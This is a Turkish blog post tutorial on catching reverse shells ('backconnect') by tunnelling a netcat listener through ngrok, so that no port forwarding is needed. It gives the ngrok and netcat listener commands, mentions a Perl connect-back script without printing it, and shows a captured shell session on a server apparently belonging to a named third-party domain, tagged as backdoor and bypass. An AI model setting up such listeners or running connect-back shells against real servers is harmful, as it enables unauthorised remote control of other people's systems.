İçeriğe geç

Backconnect Server With Ngrok

Daha önce ki Ngrok yazımda ngrok işlevi hakkında detaylı bilgi vermiştim. O yüzden kurulum kullanım kısmını atlıyorum ve direk konuya dalıyorum.

 

  1. Ngrok Download linkinden edinebilirsiniz.
  2. Netcat Download linkinden indirebilirsiniz.

Ngrok kurulum ve token işlerini bitirdikten sonra uzak bağlantıya hazırlayalım. 8081 portunda tcp bağlantı başlatıyoruz.

./ngrok.exe tcp 8081

Daha sonra ngrok bize ip adresi ve port olarak kullanacağımız bilgileri veriyor.

localhost:8081=> bizim yerelde belirlemiş olduğumuz bağlantı portunu ifade eder. biz 8081 portu için işlem başlattık.

Yukarıda bize tcp://0.tcp.ngrok.io:11272 şeklinde çıktısını verdi. Aslında burada

0.tcp.ngrok.io adresi ip adresi olarak , 11272 ise port numarası olarak kullanacağız. Anlaşıldığı üzere bizim bilgisayarımıza gelmesini belirlediğimiz port için ngrok aracı oluyor ve isteği kendi servisi ve kendisinin belirlemiş olduğu bir port üzerinden bize iletiyor. Bizim aracımız oluyor. Bizim ayrıca port açma modem ayarı gibi işlerle uğraşmamıza gerek kalmıyor. Daha sonra biz netcat ile

./nc.exe -lnvp 8081

komutunu çalıştırıyoruz ve bize 8081 portu üzerinden gelecek istekleri dinlemeye alıyoruz.

λ .\nc.exe -lnvp 8081 listening on [any] 8081... 

Backconnect İşleminin yapılması.

Bu işlemin onlarca yöntemi var. Tamamen sizin isteğinize kalmış. Örnek olarak perl ile bağlantı sağlayan bir script var ama python ile bu işlemin nasıl yapılacağını da bir önceki konumda anlatmıştır. Hepsinde olayımız aynı aslında. Sadece ip adresi olarak belirtilen adrese ngrok tarafından size verilen 0.tcp.ngrok.io adresini ve portu girmeniz yeterli olacaktır. Aşağıdaki görsel temsilidir. Perl aracılığıyla bağlantıyı gerçekleştiren bir script ile backconnect başlatılmış ve bağlantı sağlanmıştır. 

 

isi-bc

Shell üzerinden başlatılan backconnect işleminin bizdeki karşılığı aşağıdaki şekilde olmaktadır. Artık bağlantı sağlanmıştır.

λ .\nc.exe -lnvp 1991
listening on [any] 1991 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 62032
sh: no job control in this shell
sh-4.2$
Bağlantı sağlanan server ın bilgilerini uname-a komutu ile göstermiştir.
sh-4.2$ uname -a                                                                                
uname -a                                                                                        
Linux thewhitecloud.ir 3.10.0-514.16.1.el7.x86_64 #1 SMP Wed Apr 12 15:04:24 UTC 2017 x86_64 x86
_64 x86_64 GNU/Linux                                                                            

Bağlantı işlemi başarılı bir şekilde gerçekleşmiştir.

Tarih:BackdoorBypassGüvenlikngrokpentestpythonShell